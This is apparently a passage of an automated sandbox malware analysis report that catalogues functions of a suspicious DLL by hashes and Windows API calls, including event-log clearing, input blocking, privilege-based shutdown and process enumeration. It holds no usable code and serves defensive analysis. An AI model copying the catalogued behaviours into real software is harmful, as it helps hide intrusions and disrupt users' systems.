                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: bindsocket
                                                          • String ID:
                                                          • API String ID: 3370621091-0
                                                          • Opcode ID: 85dc332e68de125305a9dd3892cc226241b1110390aa54452521c95da12b1cd6
                                                          • Instruction ID: 8e805546ef113c3ac3a2f35078ac83ca8a84d9fad177171d366f9001e7ac871c
                                                          • Opcode Fuzzy Hash: 85dc332e68de125305a9dd3892cc226241b1110390aa54452521c95da12b1cd6
                                                          • Instruction Fuzzy Hash: E8116DB4814311AFE300DF38D8856EABBE4FF89318F444A1DF49CC7290E3B58A458B96
                                                          Function 100270F0 Relevance: 6.0, APIs: 4, Instructions: 47processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 10027105
                                                          • Process32First.KERNEL32(00000000,?), ref: 10027112
                                                          • CloseHandle.KERNEL32(00000000,00000000,?), ref: 1002715B
                                                            • Part of subcall function 10026F40: CreateToolhelp32Snapshot.KERNEL32(00000008,?,00000000,00000000,?,00000074), ref: 10026F67
                                                            • Part of subcall function 10026F40: Module32First.KERNEL32(00000000,00000000), ref: 10026F7C
                                                            • Part of subcall function 10026F40: lstrcmpiA.KERNEL32(?,?), ref: 10026F9B
                                                            • Part of subcall function 10026F40: Module32Next.KERNEL32(00000000,00000000), ref: 10026FA7
                                                            • Part of subcall function 10026F40: lstrcmpiA.KERNEL32(?,?), ref: 10026FB9
                                                            • Part of subcall function 10026F40: CloseHandle.KERNEL32(00000000), ref: 10026FC4
                                                          • Process32Next.KERNEL32(00000000,?), ref: 10027150
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateFirstHandleModule32NextProcess32SnapshotToolhelp32lstrcmpi
                                                          • String ID:
                                                          • API String ID: 1584622316-0
                                                          • Opcode ID: 0e47aba4332e876abc14e7755c421cd63b0223f9de7432f19338bccb8822ca76
                                                          • Instruction ID: b3f5742757dc67417d80ccb19e15a7cf549f2a7c7405ea7f21a0163c39de1ff2
                                                          • Opcode Fuzzy Hash: 0e47aba4332e876abc14e7755c421cd63b0223f9de7432f19338bccb8822ca76
                                                          • Instruction Fuzzy Hash: 38F0A4B75002116AE750D764FC82EBB76ECEF84790F864529FD4886141EB29DD1482F2
                                                          Function 1002E040 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: exitfprintf
                                                          • String ID: %s
                                                          • API String ID: 4243785698-620797490
                                                          • Opcode ID: 03333f95fef85bc0df1127a16eb1059678bd71b25b6db18252634e95f31398a0
                                                          • Instruction ID: 6f155611732fe7ec41cc1d54d80d8b4e09f7450b979776304a28c182110c1cba
                                                          • Opcode Fuzzy Hash: 03333f95fef85bc0df1127a16eb1059678bd71b25b6db18252634e95f31398a0
                                                          • Instruction Fuzzy Hash: C9E0653D800111AFD200DB54DC45EAFB7A8EF85305F448865F54CA7215D735E90987A6
                                                          Function 100174C0 Relevance: 4.7, APIs: 3, Instructions: 166keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • BlockInput.USER32(00000000), ref: 1001750C
                                                          • BlockInput.USER32(?,?,?,00000000), ref: 10017528
                                                          • BlockInput.USER32(?), ref: 100175D3
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: 70d7b4fe06ccd1aeb7d671d919ba715909ed7347f82ce07ad212871d477d66c2
                                                          • Instruction ID: 7c35041cbc989ced744e84bc2fe7d25f999f3a5f95f372f905baf80f1d985716
                                                          • Opcode Fuzzy Hash: 70d7b4fe06ccd1aeb7d671d919ba715909ed7347f82ce07ad212871d477d66c2
                                                          • Instruction Fuzzy Hash: 8E51F737B485849BC714DF98A452BEEFB65FB85621F0082AFE95987741CB366410C7D0
                                                          Function 10009B60 Relevance: 4.6, APIs: 3, Instructions: 76fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 100089F0: lstrlenA.KERNEL32(?), ref: 10008A21
                                                            • Part of subcall function 100089F0: malloc.MSVCRT ref: 10008A29
                                                            • Part of subcall function 100089F0: lstrcpyA.KERNEL32(00000000,?), ref: 10008A41
                                                            • Part of subcall function 100089F0: CharNextA.USER32(00000002), ref: 10008A6D
                                                            • Part of subcall function 100089F0: CharNextA.USER32(00000002), ref: 10008A8B
                                                            • Part of subcall function 100089F0: GetFileAttributesA.KERNEL32(00000000), ref: 10008ACF
                                                            • Part of subcall function 100089F0: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 10008ADC
                                                            • Part of subcall function 100089F0: GetLastError.KERNEL32 ref: 10008AE6
                                                            • Part of subcall function 100089F0: free.MSVCRT ref: 10008B44
                                                          • FindFirstFileA.KERNEL32(?,?,00000041,00000000,00000000,00000001,?,?,00000000,00000065), ref: 10009BDA
                                                          • FindClose.KERNEL32(00000000,0000006D,?,00000000,00000065), ref: 10009C06
                                                          • FindClose.KERNEL32(00000000,?,00000000,00000065), ref: 10009C21
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CharCloseFileNext$AttributesCreateDirectoryErrorFirstLastfreelstrcpylstrlenmalloc
                                                          • String ID:
                                                          • API String ID: 887710168-0
                                                          • Opcode ID: 6703766433a7eb1751993fb2cde4a4e3e360f15e5c6b0555f0ff15d622da5f13
                                                          • Instruction ID: 7edccb4fe516f4dcd3f53cbb636c582056df7d6c9d487251626477ac035d64a7
                                                          • Opcode Fuzzy Hash: 6703766433a7eb1751993fb2cde4a4e3e360f15e5c6b0555f0ff15d622da5f13
                                                          • Instruction Fuzzy Hash: FC11F3367001104BE714DB24DC91BFAB3D5EB89360F04063AFE1ACB2D6CA776D45C2A4
                                                          Function 100209D0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10020A10
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 10020A25
                                                          • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10020A30
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: 9cd60866ab50a98c35c1f79ff38d4de2054aee1ceee2e1c8484874dd467a29a6
                                                          • Instruction ID: f6f7157a8b3012e72d1b12e548f4c87b378eb29056a0154ccc3d0e26a5706136
                                                          • Opcode Fuzzy Hash: 9cd60866ab50a98c35c1f79ff38d4de2054aee1ceee2e1c8484874dd467a29a6
                                                          • Instruction Fuzzy Hash: 9AF01D7515C380BFE340DB2889C4AABBBE8EBA4640FC45D4EF58943252D234D808CB27
                                                          Function 1000E540 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenEventLogA.ADVAPI32(00000000), ref: 1000E57C
                                                          • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 1000E587
                                                          • CloseEventLog.ADVAPI32(00000000), ref: 1000E58A
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$ClearCloseOpen
                                                          • String ID:
                                                          • API String ID: 1391105993-0
                                                          • Opcode ID: b719f0b8eb9c5516b5e29b39de37e38f590415d9596412b4ce2da0eade4c8ec0
                                                          • Instruction ID: e2617011e296939ca9cc499396a789e41a2db0335649869ff5bc3c2fc59dee1f
                                                          • Opcode Fuzzy Hash: b719f0b8eb9c5516b5e29b39de37e38f590415d9596412b4ce2da0eade4c8ec0
                                                          • Instruction Fuzzy Hash: B8F0C271504755DBD300DF09CC80B4BBBE8FB88340F800D09F954A7201E775AE088BA6
                                                          Function 10010640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13shutdownCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 10010656
                                                            • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                            • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                            • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                            • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCloseCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesValueWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3672536310-3733053543
                                                          • Opcode ID: 5c3b0d6465ec82876b96f4a11b20ef9413b9959b1a27daeafe2d367ede1fa4d8
                                                          • Instruction ID: 8bb9d6b82e749448676f30d8a34e8541df49bcb33f5f773f867f71790e701dd0
                                                          • Opcode Fuzzy Hash: 5c3b0d6465ec82876b96f4a11b20ef9413b9959b1a27daeafe2d367ede1fa4d8
                                                          • Instruction Fuzzy Hash: E9C01279540B0C2BD450DB509C87F4A32549B24705F544810F7145D1C1EAB9B454497E
                                                          Function 100945E0 Relevance: 3.3, Strings: 2, Instructions: 786COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2$?
                                                          • API String ID: 0-2669683831
                                                          • Opcode ID: c30fb91f7101324caad65e2f9e64a6ec26f644dd34b301a4e3530a54b4971cc1
                                                          • Instruction ID: 80fd9bf3dc583d0cac63423e0576a3226711f705e4ebeea8ddc075c458584ecb
                                                          • Opcode Fuzzy Hash: c30fb91f7101324caad65e2f9e64a6ec26f644dd34b301a4e3530a54b4971cc1
                                                          • Instruction Fuzzy Hash: 2F72E6B4604B429FD368CF29C890B9AF7E5FB88304F118A2DE59D87311EB30A955CF91
                                                          Function 1007E960 Relevance: 2.3, Strings: 1, Instructions: 1060COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: U,E
                                                          • API String ID: 0-4027942359
                                                          • Opcode ID: bb403865d610320d9d3144d3c8a59b381feae8db40863a7a375d4a88aa33cec3
                                                          • Instruction ID: 62788b8b9c83910406f6e107d4ec69dc7ae710b733b3debf393c051762315612
                                                          • Opcode Fuzzy Hash: bb403865d610320d9d3144d3c8a59b381feae8db40863a7a375d4a88aa33cec3
                                                          • Instruction Fuzzy Hash: 799279B5A002499FDB24CF28C881BEA77E5FF88344F50852EEA49CB351D734EA45CB95
                                                          Function 10083DB0 Relevance: 2.3, APIs: 1, Instructions: 1021COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: sprintf
                                                          • String ID:
                                                          • API String ID: 590974362-0
                                                          • Opcode ID: 48435f66881ac71c2cd8dabe8509d0ac168b854dbcf2394b00f4e63b212b4014
                                                          • Instruction ID: bcff93c0175b99dd2eacf99e5bdf588fdf07a621a5c2bf021a832251e409d90f
                                                          • Opcode Fuzzy Hash: 48435f66881ac71c2cd8dabe8509d0ac168b854dbcf2394b00f4e63b212b4014
                                                          • Instruction Fuzzy Hash: 8A72F779A00B045FD320DE16DC81BAB73D5EFC5310F11C42DEAAA87B92EAB4F9418795
                                                          Function 10096580 Relevance: 2.2, Strings: 1, Instructions: 914COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `
                                                          • API String ID: 0-2679148245
                                                          • Opcode ID: 91662ec1cff2479ffb4d0807e694abe4bd9433d31a24d6642f7bb7654cd80fd5
                                                          • Instruction ID: 6d153d7317b443229e76589623fbd87a7527c5a4b9c51e2e973f172cac6381ac
                                                          • Opcode Fuzzy Hash: 91662ec1cff2479ffb4d0807e694abe4bd9433d31a24d6642f7bb7654cd80fd5
                                                          • Instruction Fuzzy Hash: A97225B56087009FD358CF28CC85A6BB7E6FBC8304F14892DF99A87355EA74E901DB52
                                                          Function 10081AF0 Relevance: 2.2, Strings: 1, Instructions: 902COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: 05437cc4da248d0b5c8cb68c61ac51f3f1356b75297161c92043c969fa7b9174
                                                          • Instruction ID: 187d62c811851c58088b2f1c6dce946c8a0fd3b94e8cc69681fc47f369cecc54
                                                          • Opcode Fuzzy Hash: 05437cc4da248d0b5c8cb68c61ac51f3f1356b75297161c92043c969fa7b9174
                                                          • Instruction Fuzzy Hash: 5F824AB5A042459FC758CF18C880AAAFBE5FF88344F14866EE949CB356D770E981CF91
                                                          Function 10095A10 Relevance: 2.1, Strings: 1, Instructions: 899COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
